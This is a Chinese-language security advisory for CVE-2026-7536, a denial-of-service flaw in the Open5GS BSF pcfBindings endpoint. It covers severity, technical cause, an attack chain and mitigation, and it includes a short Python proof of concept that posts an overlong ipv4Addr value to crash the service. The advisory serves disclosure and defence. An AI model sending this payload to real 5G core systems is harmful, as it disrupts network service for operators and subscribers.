CVE-2026-7536 CVSS 5.3 中危

CVE-2026-7536 Open5GS BSF组件拒绝服务漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7536

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及之前版本的BSF组件被披露存在安全漏洞。该漏洞位于/nbsf-management/v1/pcfBindings接口，由于bsf_sess_add_by_ip_address函数未能正确处理ipv4Addr参数，攻击者可远程发送特制请求操纵该参数。利用此漏洞无需任何认证或用户交互，攻击成功后可导致目标服务崩溃，造成拒绝服务，严重影响5G核心网的业务连续性和可用性。

技术细节

该漏洞源于Open5GS中BSF（绑定支持功能）组件在处理特定网络请求时的逻辑缺陷。具体受影响的是/nbsf-management/v1/pcfBindings路径下的bsf_sess_add_by_ip_address函数。该函数负责通过IP地址添加会话信息，但在解析ipv4Addr参数时未进行足够的边界检查或格式验证。攻击者可以通过网络向受影响设备发送包含恶意构造ipv4Addr参数的POST请求。由于缺乏严格的输入过滤，畸形的参数值可能导致底层处理函数出现内存访问越界、空指针解引用或资源死锁等异常情况，进而导致BSF进程崩溃。虽然攻击无法获取敏感信息或提升权限，但造成的拒绝服务会中断5G网络中的会话绑定功能，严重影响网络可用性。鉴于CVSS评分为中危，建议运营者尽快排查受影响资产。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出暴露在互联网上的Open5GS实例，特别是开放了BSF管理接口的目标。

STEP 2

武器化

攻击者构造一个包含畸形ipv4Addr参数的恶意HTTP POST请求，该参数旨在触发解析逻辑缺陷。

STEP 3

投递

攻击者通过互联网向受害者的/nbsf-management/v1/pcfBindings接口发送上述恶意请求。

STEP 4

利用

Open5GS BSF组件处理该请求时，由于bsf_sess_add_by_ip_address函数存在缺陷，导致服务进程崩溃或挂起。

STEP 5

影响

BSF服务停止响应，导致5G网络中依赖该组件的会话绑定功能中断，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Placeholder)
# The vulnerability affects the /nbsf-management/v1/pcfBindings endpoint
target_url = "http://<target_ip>:<port>/nbsf-management/v1/pcfBindings"

# Malicious payload for ipv4Addr
# Sending a malformed or overly long IP address to trigger the DoS
payload = {
    "ipv4Addr": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
    "supi": "imsi-999990000000001"
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, json=payload, headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("Exploit sent. Check if the Open5GS BSF service has crashed.")
except requests.exceptions.RequestException as e:
    print(f"An error occurred: {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在未升级补丁前，建议通过防火墙规则严格限制对Open5GS BSF组件端口的访问来源，禁止公网直接访问管理接口。同时，应加强系统日志监控，一旦发现针对/nbsf-management/v1/pcfBindings的异常高频请求或服务进程异常退出，应立即进行隔离排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7536
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7536
3 Details https://www.cvedetails.com/cve/CVE-2026-7536/
4 VulDB https://vuldb.com/cve/CVE-2026-7536
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4400
7 Link https://vuldb.com/submit/804292
8 Link https://vuldb.com/vuln/360353
9 Link https://vuldb.com/vuln/360353/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表